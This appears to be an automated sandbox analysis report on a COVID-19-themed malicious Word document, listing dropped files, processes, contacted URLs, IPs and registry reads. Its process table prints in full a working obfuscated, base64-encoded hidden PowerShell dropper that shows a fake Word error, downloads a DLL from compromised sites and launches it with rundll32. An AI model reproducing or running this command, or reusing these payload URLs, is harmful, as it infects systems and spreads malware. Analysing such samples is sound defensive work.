Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
AG60273928I_COVID-19_SARS-CoV-2.doc
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Borders Strategist
Brook Designer sky blue overriding neural auxiliary Ergonomic Metal Pants International Solutions withdrawal Associate, Author:
La Breton, Template: Normal.dotm, Last Saved By: Nicolas Menard, Revision Number: 1, Name of Creating Application: Microsoft
Office Word, Create Time/Date: Tue Jan 12 14:56:00 2021, Last Saved Time/Date: Tue Jan 12 14:57:00 2021, Number of Pages:
1, Number of Words: 2554, Number of Characters: 14559, Security: 8
|
initial sample
|
||
C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73127D7D-FA20-48C4-87C4-17800DB89026}.tmp
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\AG60273928I_COVID-19_SARS-CoV-2.LNK
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14
2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 13 02:15:37 2021, length=162304, window=hide
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J81QN4I88FVGHDT92CK8.temp
|
data
|
dropped
|
||
C:\Users\user\Desktop\~$60273928I_COVID-19_SARS-CoV-2.doc
|
data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
|
||
C:\Windows\System32\cmd.exe
|
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD
JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AMwAnACsAJwAvACcAKwAnAEAAJwArACgAJwB3AF0AeABtACcAKwAnAFsAdgBzACcAKQArACcAOgAvACcAKwAnAC8AJwArACcAYwBhACcAKwAnAHAAJwArACgAJwB0AHUAcgAnACsAJwBlACcAKwAnAHQAaABlAGEAYwAnACkAKwAnAHQAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAKAAnAGMAbwBtAC4AJwArACcAYQB1ACcAKQArACgAJwAvACcAKwAnAHcAcAAtACcAKwAnAGkAbgBjACcAKQArACcAbAB1ACcAKwAnAGQAJwArACgAJwBlAHMAJwArACcALwBZACcAKQArACcAagBwACcAKwAoACcALwBAACcAKwAnAHcAXQAnACsAJwB4AG0AWwB2AHMAOgAnACsAJwAvAC8AdABoACcAKQArACcAZQBuACcAKwAoACcAZQAnACsAJwB0AHcAJwArACcAbwByAGsAJwArACcAZQByAC4AYwAnACkAKwAoACcAYQAnACsAJwAvAGMAJwApACsAJwBvAG0AJwArACcAbQBlACcAKwAnAG4AdAAnACsAJwAvACcAKwAnADgAJwArACcATgA0ACcAKwAnAC8AJwArACcAQAAnACsAJwB3ACcAKwAoACcAXQB4AG0AJwArACcAWwB2ACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB0AHIAJwApACsAKAAnAGEAJwArACcAeQBvAG4AbABpAG4AJwApACsAJwBlACcAKwAnAGcAJwArACcAaAAuACcAKwAoACcAYwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAtAGIAaQAnACkAKwAoACcAbgAnACsAJwAvAEgAQgBQACcAKwAnAFIALwBAACcAKQArACcAdwBdACcAKwAnAHgAbQAnACsAKAAnAFsAdgAnACsAJwA6AC8ALwBtAG0AbwAnACsAJwAuACcAKQArACgAJwBtACcAKwAnAGEAcgAnACkAKwAnAHQAaQAnACsAKAAnAG4AcABvAGwAbABvACcAKwAnAGMAJwArACcAawAuAGMAbwAuACcAKQArACgAJwB1AGsAJwArACcALwBhAC8AJwArACcAUwBRAFMAJwApACsAJwBHACcAKwAnAGcAJwArACcALwAnACkALgAiAHIAZQBgAFAAYABMAGEAYwBFACIAKAAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAJwB2ACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAEUANwA3AEsAIAArACAAJABOADMAMQA3ADYAYwByACAAKwAgACQAVQAxADEASAApADsAJABZADgAXwBZAD0AKAAoACcASwA5ACcAKwAnADAAJwApACsAJwBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAB5AHQAdwB6ADIAcwAgAGkAbgAgACQAWAA0AF8AMQBxADgAcQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAHMAVABFAG0ALgBuAEUAdAAuAFcAZQBCAEMAbABpAEUATgB0ACkALgAiAGQAbwBXAG4AYABMAGAAbwBBAGQAZgBJAGAATABFACIAKAAkAEwAeQB0AHcAegAyAHMALAAgACQATwBqAGkAaABuAHcAZwApADsAJABaADgAMwBRAD0AKAAnAFgAMAAnACsAJwAzAEcAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAE8AagBpAGgAbgB3AGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAAxADcAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQATwBqAGkAaABuAHcAZwAsACgAKAAnAFMAJwArACcAaABvACcAKQArACgAJwB3AEQAaQAnACsAJwBhACcAKwAnAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAFkANgA5AEwAPQAoACcASwA4ACcAKwAnADQAVgAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwAyAFYAPQAoACcAWAAwACcAKwAnADcAUwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANQAxAE8APQAoACgAJwBIACcAKwAnAF8AMwAnACkAKwAnAEcAJwApAA==
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AMwAnACsAJwAvACcAKwAnAEAAJwArACgAJwB3AF0AeABtACcAKwAnAFsAdgBzACcAKQArACcAOgAvACcAKwAnAC8AJwArACcAYwBhACcAKwAnAHAAJwArACgAJwB0AHUAcgAnACsAJwBlACcAKwAnAHQAaABlAGEAYwAnACkAKwAnAHQAaQAnACsAJwBvACcAKwAnAG4AJwArACcALgAnACsAKAAnAGMAbwBtAC4AJwArACcAYQB1ACcAKQArACgAJwAvACcAKwAnAHcAcAAtACcAKwAnAGkAbgBjACcAKQArACcAbAB1ACcAKwAnAGQAJwArACgAJwBlAHMAJwArACcALwBZACcAKQArACcAagBwACcAKwAoACcALwBAACcAKwAnAHcAXQAnACsAJwB4AG0AWwB2AHMAOgAnACsAJwAvAC8AdABoACcAKQArACcAZQBuACcAKwAoACcAZQAnACsAJwB0AHcAJwArACcAbwByAGsAJwArACcAZQByAC4AYwAnACkAKwAoACcAYQAnACsAJwAvAGMAJwApACsAJwBvAG0AJwArACcAbQBlACcAKwAnAG4AdAAnACsAJwAvACcAKwAnADgAJwArACcATgA0ACcAKwAnAC8AJwArACcAQAAnACsAJwB3ACcAKwAoACcAXQB4AG0AJwArACcAWwB2ACcAKQArACgAJwBzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB0AHIAJwApACsAKAAnAGEAJwArACcAeQBvAG4AbABpAG4AJwApACsAJwBlACcAKwAnAGcAJwArACcAaAAuACcAKwAoACcAYwBvACcAKwAnAG0ALwAnACsAJwBjAGcAaQAtAGIAaQAnACkAKwAoACcAbgAnACsAJwAvAEgAQgBQACcAKwAnAFIALwBAACcAKQArACcAdwBdACcAKwAnAHgAbQAnACsAKAAnAFsAdgAnACsAJwA6AC8ALwBtAG0AbwAnACsAJwAuACcAKQArACgAJwBtACcAKwAnAGEAcgAnACkAKwAnAHQAaQAnACsAKAAnAG4AcABvAGwAbABvACcAKwAnAGMAJwArACcAawAuAGMAbwAuACcAKQArACgAJwB1AGsAJwArACcALwBhAC8AJwArACcAUwBRAFMAJwApACsAJwBHACcAKwAnAGcAJwArACcALwAnACkALgAiAHIAZQBgAFAAYABMAGEAYwBFACIAKAAoACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAJwB2ACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAcABMAGAAaQBUACIAKAAkAEUANwA3AEsAIAArACAAJABOADMAMQA3ADYAYwByACAAKwAgACQAVQAxADEASAApADsAJABZADgAXwBZAD0AKAAoACcASwA5ACcAKwAnADAAJwApACsAJwBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATAB5AHQAdwB6ADIAcwAgAGkAbgAgACQAWAA0AF8AMQBxADgAcQApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwAnACsAJwBiAGoAZQBjAHQAJwApACAAUwBZAHMAVABFAG0ALgBuAEUAdAAuAFcAZQBCAEMAbABpAEUATgB0ACkALgAiAGQAbwBXAG4AYABMAGAAbwBBAGQAZgBJAGAATABFACIAKAAkAEwAeQB0AHcAegAyAHMALAAgACQATwBqAGkAaABuAHcAZwApADsAJABaADgAMwBRAD0AKAAnAFgAMAAnACsAJwAzAEcAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAE8AagBpAGgAbgB3AGcAKQAuACIATABgAGUATgBHAHQAaAAiACAALQBnAGUAIAAzADIAOAAxADcAKQAgAHsALgAoACcAcgAnACsAJwB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQATwBqAGkAaABuAHcAZwAsACgAKAAnAFMAJwArACcAaABvACcAKQArACgAJwB3AEQAaQAnACsAJwBhACcAKwAnAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAHMAVABSAEkAYABOAGcAIgAoACkAOwAkAFkANgA5AEwAPQAoACcASwA4ACcAKwAnADQAVgAnACkAOwBiAHIAZQBhAGsAOwAkAFYAXwAyAFYAPQAoACcAWAAwACcAKwAnADcAUwAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANQAxAE8APQAoACgAJwBIACcAKwAnAF8AMwAnACkAKwAnAEcAJwApAA==
|
||
C:\Windows\SysWOW64\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
|
||
C:\Windows\SysWOW64\rundll32.exe
|
C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
|
||
C:\Windows\System32\msg.exe
|
msg user /v Word experienced an error trying to open the file.
|
||
C:\Windows\System32\rundll32.exe
|
'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://thenetworker.ca/comment/8N4/
|
unknown
|
||
https://shulovbaazar.com
|
unknown
|
||
http://uhk.cncranes.com
|
unknown
|
||
https://trayonlinegh.com/cgi-bin/HBPR/
|
unknown
|
||
http://mmo.martinpollock.co.uk/a/SQSGg/
|
unknown
|
||
http://uhk.cncranes.com/ErrorPages/3/
|
152.32.168.168
|
||
https://mybusinessevent.com
|
unknown
|
||
http://69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/
|
69.49.88.46
|
||
https://mybusinessevent.com/tiki-install/e/
|
unknown
|
||
https://capturetheaction.com.au/wp-includes/Yjp/
|
unknown
|
||
https://shulovbaazar.com/c/bcL6/
|
unknown
|
||
http://www.windows.com/pctv.
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
http://www.msnbc.com/news/ticker.txt
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
http://www.litespeedtech.com
|
unknown
|
||
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
|
unknown
|
||
http://www.hotmail.com/oe
|
unknown
|
||
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
|
unknown
|
||
https://mybusinessevent.comp
|
unknown
|
||
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
||
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
|
unknown
|
||
https://shulovbaazar.comp
|
unknown
|
||
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
https://sectigo.com/CPS0D
|
unknown
|
||
http://www.piriform.com/ccleaner
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
mybusinessevent.com
|
185.2.4.29
|
||
shulovbaazar.com
|
51.79.161.36
|
||
uhk.cncranes.com
|
unknown
|
||
uhk.asiash.com
|
152.32.168.168
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
69.49.88.46
|
unknown
|
United States
|
unknown
|
||
71.72.196.159
|
unknown
|
United States
|
unknown
|
||
185.2.4.29
|
unknown
|
Italy
|
unknown
|
||
51.79.161.36
|
unknown
|
Canada
|
unknown
|
||
152.32.168.168
|
unknown
|
Hong Kong
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
' 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
?!2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
u#2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ED49E
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
